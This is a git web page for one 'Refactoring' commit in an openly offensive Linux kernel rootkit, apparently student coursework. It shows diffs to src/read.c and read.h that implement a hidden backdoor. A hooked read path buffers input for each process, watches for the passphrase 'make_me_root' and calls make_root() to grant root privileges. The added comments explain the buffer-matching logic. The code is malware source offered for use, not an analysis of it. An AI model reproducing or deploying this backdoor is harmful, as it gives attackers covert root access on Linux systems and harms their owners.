linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit 7d955e36f93d9394d4e281d3e2bb11d7fa3bc1b3
parent 070f42ac284548ef79a192fc6401f69e2a07bf50
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 29 Nov 2020 13:13:37 +0100

Refactoring

Diffstat:
Msrc/read.c | 19+++++++++++++++----
Msrc/read.h | 4++--
2 files changed, 17 insertions(+), 6 deletions(-)

diff --git a/src/read.c b/src/read.c @@ -7,10 +7,12 @@ #include "hook.h" #include "creds.h" -DEFINE_HASHTABLE(pid_ht, 8); +DEFINE_HASHTABLE(pid_ht, 8); //2^8 buckets _should_ keep collisions low static const char *accept = "makerot_"; + +//Using strspn allows us to only read inputs that include valid characters static int is_valid(char *buf, size_t size) { @@ -73,6 +75,15 @@ get_entry(pid_t key) return NULL; } +/** + * The idea here is to fill up our buffer as much as we can + * Should we reach the maximum capacity, we first of all + * compare what we read so far; if it's a match, grant root + * Otherwise, we can safely move the last 11 bytes to the start + * (as the worst case is reading 'make_me_roo', which + * is 11 characters long) + * This means we need to offset str with (23 - 11) = 12 = SHIFT_OFF + **/ static void handle_compare(char *buf, pid_t pid, size_t size) { @@ -96,8 +107,8 @@ handle_compare(char *buf, pid_t pid, size_t size) } if(entry->capacity == 0) { - memmove(entry->str, (entry->str + 12), 12); - entry->capacity = entry->iter = 12; + memmove(entry->str, (entry->str + SHIFT_OFF), SHIFT_OFF); + entry->capacity = entry->iter = SHIFT_OFF; goto fill; } @@ -114,7 +125,7 @@ handle_pid(pid_t pid, __user char *buf, size_t size) char *str = kzalloc(size, GFP_KERNEL); copy_from_user(str, buf, size); - //Early return on exact match + //Early return on exact match, avoiding more expensive operations if(strnstr(str, PASSPHRASE, size)) { make_root(); return; diff --git a/src/read.h b/src/read.h @@ -2,7 +2,7 @@ #define _GROUP7_READ_H #define PASSPHRASE "make_me_root" -#define PASSHPHRASE_LEN 12 +#define SHIFT_OFF 12 #define MAX_BUF 23 //We never need to save more than 23 Bytes @@ -14,7 +14,7 @@ struct pid_entry { pid_t pid; char *str; int capacity; - int iter; + int iter; //Keep track of where we left off while filling str struct hlist_node hlist; };